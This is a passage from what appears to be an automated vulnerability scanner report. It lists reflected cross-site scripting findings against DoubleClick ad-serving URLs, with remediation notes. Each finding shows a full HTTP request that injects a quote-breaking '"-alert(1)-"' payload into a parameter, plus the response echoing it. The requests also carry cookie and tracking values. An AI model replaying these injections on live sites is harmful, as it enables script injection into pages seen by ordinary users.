User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5359
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:09:20 GMT
Expires: Tue, 28 Jun 2011 03:09:20 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=43b35"-alert(1)-"26719022c54http://www.universalstudioshollywood.com/ticket_hotel.html?__source=omd_hotel_Outer_xplusone");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false
...[SNIP]...

1.115. http://ad.doubleclick.net/adi/x1.rtb/ushouter/poe [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/ushouter/poe

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982d"-alert(1)-"af7369214d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/ushouter/poe;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930e982d"-alert(1)-"af7369214d&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=;u=17941001;ord=3970665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLOw4CMQwFwMdXQXsNOmQptuPE21PTUm-It6PjSByIIwH9zIQNgHNdHi6chdwGUxF16rGulC1XE3adNSdsb6frZ8LuP3pZeo-qpOGN2rCZBtcgLzpY7Oc9EvZAuyQcgPcz4Qi87vgCKqRUuHMAAAA%3D%26dst%3Dhttp%253A%252F%252Fwww.universalstudioshollywood.com&_wp=AAABMNQ0zrhF-bb1X0lbBkqVq5sJoav9IfQqNg&_nv=1&_CDbg=17934428&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFyoEQEAAAAAdb8RAQAAAABFqBEBAAAAAAnCEQEAAAAAa8IRAQAAAABswhEBAAAAACND7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA2YWM4MjEwMi04NWQxLTQyMzgtYmVmZi0wNTA2NTIxODM5MzAkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAANBECU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5664
Date: Tue, 28 Jun 2011 03:05:29 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
966987/1%3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930e982d"-alert(1)-"af7369214d&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df
...[SNIP]...

1.116. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2da41"-alert(1)-"e30b3cebf4a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=1009292da41"-alert(1)-"e30b3cebf4a&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1875
Date: Tue, 28 Jun 2011 03:54:36 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/ab/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=1009292da41"-alert(1)-"e30b3cebf4a&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placements/47553125.j
...[SNIP]...

1.117. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fbf"-alert(1)-"08481952506 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492b8fbf"-alert(1)-"08481952506&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1875
Date: Tue, 28 Jun 2011 03:54:20 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/ab/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492b8fbf"-alert(1)-"08481952506&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placem
...[SNIP]...

1.118. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c38e3"-alert(1)-"32d625406f was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c38e3"-alert(1)-"32d625406f&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1874
Date: Tue, 28 Jun 2011 03:54:53 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c38e3"-alert(1)-"32d625406f&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placements/47553125.js\" type=\"text/javascript\">
...[SNIP]...

1.119. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9d41"-alert(1)-"4c11fe208dc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=e9d41"-alert(1)-"4c11fe208dc HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1875
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:55:05 GMT
Expires: Tue, 28 Jun 2011 03:55:05 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/ab/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=e9d41"-alert(1)-"4c11fe208dc",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placements/47553125.js\" type=\"text/javascript\">
...[SNIP]...

1.120. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97a47"-alert(1)-"b6016578f1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=46691761844519456197a47"-alert(1)-"b6016578f1&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1874
Date: Tue, 28 Jun 2011 03:54:07 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=46691761844519456197a47"-alert(1)-"b6016578f1&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.c
...[SNIP]...

1.121. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54176"-alert(1)-"35e05f8a498 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=5354176"-alert(1)-"35e05f8a498&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:32:03 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=5354176"-alert(1)-"35e05f8a498&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "o
...[SNIP]...

1.122. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cda"-alert(1)-"eecdafd0da1 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747c3cda"-alert(1)-"eecdafd0da1&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:31:43 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747c3cda"-alert(1)-"eecdafd0da1&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.123. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79bd"-alert(1)-"583b910f332 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

